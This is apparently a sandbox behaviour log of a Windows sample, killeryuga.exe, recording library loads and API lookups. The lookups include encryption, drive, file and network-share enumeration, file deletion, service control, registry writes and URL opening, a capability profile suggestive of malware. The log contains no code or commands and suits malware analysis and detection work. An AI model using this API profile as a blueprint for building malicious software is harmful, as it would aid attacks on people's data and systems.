Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DefDlgProcW, address_out = 0x77194100 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DdeUnaccessData, address_out = 0x74fa82f4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetClassInfoExW, address_out = 0x74f5b238 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetScrollBarInfo, address_out = 0x74f63ff8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CharLowerA, address_out = 0x74f63e75 True 1
Fn
System Get Time type = System Time, time = 2019-03-24 16:36:12 (UTC) True 1
Fn
System Get Time type = Ticks, time = 95488 True 1
Fn
System Get Time type = Performance Ctr, time = 14672507109 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x76c34f2b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x76c31252 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x76c34208 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x76c3359f True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77169d35 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77169d35 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77169d35 True 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe, size = 260 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x76c35235 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x76c5735f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Module32FirstW, address_out = 0x76c579f9 True 1
Fn
System Get Info type = Hardware Information True 249
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalAlloc, address_out = 0x76c3588e True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x76c3435f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x76c349d7 True 1
Fn
Module Load module_name = kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x76c31856 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x76c3435f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x76c3186e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExA, address_out = 0x76c33519 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x76c4d802 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x76c37a10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetErrorMode, address_out = 0x76c31b00 True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Load module_name = RPCRT4.dll, base_address = 0x75ee0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\rpcrt4.dll, function = RpcStringFreeA, address_out = 0x75f23fc5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\rpcrt4.dll, function = UuidToStringA, address_out = 0x75f5d918 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\rpcrt4.dll, function = UuidToStringW, address_out = 0x75f21ee5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\rpcrt4.dll, function = RpcStringFreeW, address_out = 0x75f01635 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\rpcrt4.dll, function = UuidCreate, address_out = 0x75eff48b True 1
Fn
Module Load module_name = MPR.dll, base_address = 0x74b50000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\mpr.dll, function = WNetEnumResourceW, address_out = 0x74b53058 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\mpr.dll, function = WNetOpenEnumW, address_out = 0x74b52f06 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\mpr.dll, function = WNetCloseEnum, address_out = 0x74b52dd6 True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x753d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetCloseHandle, address_out = 0x753eab49 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenW, address_out = 0x753f9197 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenUrlW, address_out = 0x7544be5c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetReadFile, address_out = 0x753eb406 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpQueryInfoW, address_out = 0x753f5c75 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenUrlA, address_out = 0x754130f1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenA, address_out = 0x753ff18e True 1
Fn
Module Load module_name = WINMM.dll, base_address = 0x74b10000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\winmm.dll, function = timeGetTime, address_out = 0x74b126e0 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x75340000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathFileExistsW, address_out = 0x753545bf True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathFileExistsA, address_out = 0x7537ad1a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathRemoveFileSpecW, address_out = 0x75353248 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathFindFileNameW, address_out = 0x7535bb71 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathFindExtensionW, address_out = 0x7535a1b9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathAppendA, address_out = 0x7534d65e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathAppendW, address_out = 0x753581ef True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidLocale, address_out = 0x76c4ce46 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoW, address_out = 0x76c33c42 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCommandLineW, address_out = 0x76c35223 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileA, address_out = 0x76c353c6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileW, address_out = 0x76c34435 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointer, address_out = 0x76c317d1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenA, address_out = 0x76c35a4b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetErrorMode, address_out = 0x76c31b00 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessW, address_out = 0x76c3103d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointerEx, address_out = 0x76c4c807 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateDirectoryW, address_out = 0x76c34259 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x76c31136 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalDrives, address_out = 0x76c35371 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x76c3186e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x76c31282 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDriveTypeA, address_out = 0x76c4ef75 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OpenProcess, address_out = 0x76c31986 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalAlloc, address_out = 0x76c3588e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemDirectoryW, address_out = 0x76c35063 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x76c3170d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryW, address_out = 0x76c3492b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x76c310ff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileW, address_out = 0x76c5830d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FormatMessageW, address_out = 0x76c34620 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpynW, address_out = 0x76c5d556 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessA, address_out = 0x76c31072 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x76c4d802 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x76c33ed3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x76c33f5c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcatA, address_out = 0x76c52b7a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentVariableA, address_out = 0x76c333a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpW, address_out = 0x76c35929 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x76c3192e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenW, address_out = 0x76c31700 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x76c3469b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetShortPathNameA, address_out = 0x76c5594d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSizeEx, address_out = 0x76c359e2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x76c311c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x76c311a9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x76c31222 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x76c31856 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MoveFileW, address_out = 0x76c49af0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32FirstW, address_out = 0x76c58baf True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LocalAlloc, address_out = 0x76c3168c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventW, address_out = 0x76c3183e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameA, address_out = 0x76c314b1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32NextW, address_out = 0x76c5896c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcatW, address_out = 0x76c5828e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateMutexA, address_out = 0x76c34c6b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultLCID, address_out = 0x76c33da5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x76c5735f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x76c31410 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteFileW, address_out = 0x76c389b3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LocalFree, address_out = 0x76c32d3c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyW, address_out = 0x76c53102 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteFileA, address_out = 0x76c35444 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyA, address_out = 0x76c52a9d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetPriorityClass, address_out = 0x76c4cf28 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x76c31809 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTimeAsFileTime, address_out = 0x76c33509 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetExitCodeProcess, address_out = 0x76c4174d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x76c34950 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalFree, address_out = 0x76c35558 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVersion, address_out = 0x76c34467 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x76c311f8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThread, address_out = 0x76c334d5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateDirectoryA, address_out = 0x76c5d526 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSemaphoreW, address_out = 0x76c4ca5a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x76c334b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x76c3110c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsFree, address_out = 0x76c33587 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsSetValue, address_out = 0x76c314fb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsGetValue, address_out = 0x76c311e0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsAlloc, address_out = 0x76c349ad True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionAndSpinCount, address_out = 0x76c31916 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetUnhandledExceptionFilter, address_out = 0x76c387c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnhandledExceptionFilter, address_out = 0x76c5772f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeEnvironmentStringsW, address_out = 0x76c351cb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentStringsW, address_out = 0x76c351e3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = QueryPerformanceCounter, address_out = 0x76c31725 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeZoneInformation, address_out = 0x76c3465a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RaiseException, address_out = 0x76c358a6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStringTypeW, address_out = 0x76c31946 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStartupInfoW, address_out = 0x76c34d40 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapSize, address_out = 0x77163002 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumSystemLocalesW, address_out = 0x76cb425f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryExW, address_out = 0x76c3495d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDateFormatW, address_out = 0x76c534d7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeFormatW, address_out = 0x76c4f481 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringW, address_out = 0x76c33bca True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringW, address_out = 0x76c317b9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleCP, address_out = 0x76cd7bff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleMode, address_out = 0x76c31328 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibrary, address_out = 0x76c334c8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x77171f6e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RtlUnwind, address_out = 0x76c5d1c3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetStdHandle, address_out = 0x76cb454f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetEnvironmentVariableA, address_out = 0x76c3e331 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x76c314c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x7715e026 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x771522b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x77152270 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStdHandle, address_out = 0x76c351b3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileType, address_out = 0x76c33531 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleExW, address_out = 0x76c34a6f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteConsoleW, address_out = 0x76c57aca True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OutputDebugStringW, address_out = 0x76c5d1d4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetConsoleCtrlHandler, address_out = 0x76c38a09 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FatalAppExitA, address_out = 0x76cb4691 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x771645f5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = AreFileApisANSI, address_out = 0x76cb40d1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x76c37a10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x76c314e9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThreadId, address_out = 0x76c31450 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThread, address_out = 0x76c317ec True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCPInfo, address_out = 0x76c35189 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetOEMCP, address_out = 0x76c5d1a1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77169d35 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x76c35235 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidCodePage, address_out = 0x76c34493 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileW, address_out = 0x76c354ee True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetComputerNameW, address_out = 0x76c3dd0e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetACP, address_out = 0x76c3179c True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x74f40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CreateWindowExW, address_out = 0x74f58a29 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = EndPaint, address_out = 0x74f61341 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DestroyWindow, address_out = 0x74f59a55 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetMessageW, address_out = 0x74f578e2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = PostQuitMessage, address_out = 0x74f59abb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = LoadCursorW, address_out = 0x74f588f7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = BeginPaint, address_out = 0x74f61361 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = TranslateMessage, address_out = 0x74f57809 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = RegisterClassExW, address_out = 0x74f5b17d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = ShowWindow, address_out = 0x74f60dfb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = IsWindow, address_out = 0x74f57136 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SendMessageW, address_out = 0x74f59679 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = UpdateWindow, address_out = 0x74f63559 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcW, address_out = 0x771625dd True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MessageBoxA, address_out = 0x74fafd1e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = PeekMessageW, address_out = 0x74f605ba True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = PostThreadMessageW, address_out = 0x74f58bff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MessageBoxW, address_out = 0x74fafd3f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DispatchMessageW, address_out = 0x74f5787b True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x74d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGetHashParam, address_out = 0x74d4df7e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CloseServiceHandle, address_out = 0x74d5369c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptAcquireContextW, address_out = 0x74d4df14 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetUserNameW, address_out = 0x74d5157a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptHashData, address_out = 0x74d4df36 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegSetValueExW, address_out = 0x74d514d6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegCloseKey, address_out = 0x74d5469d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyHash, address_out = 0x74d4df66 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = ControlService, address_out = 0x74d67144 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExW, address_out = 0x74d5468d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = OpenServiceW, address_out = 0x74d4ca4c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptReleaseContext, address_out = 0x74d4e124 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptCreateHash, address_out = 0x74d4df4e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptEncrypt, address_out = 0x74d6779b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptImportKey, address_out = 0x74d4c532 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = QueryServiceStatus, address_out = 0x74d52a86 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryValueExW, address_out = 0x74d546ad True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = OpenSCManagerW, address_out = 0x74d4ca64 True 1
Fn
Module Load module_name = SHELL32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetSpecialFolderLocation, address_out = 0x7605e141 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = CommandLineToArgvW, address_out = 0x75fe9ee8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteExW, address_out = 0x75ff1e46 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteA, address_out = 0x76217078 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetPathFromIDListW, address_out = 0x760617bf True 1
Fn
Module Load module_name = ole32.dll, base_address = 0x755e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoInitialize, address_out = 0x755fb636 True 1
Fn
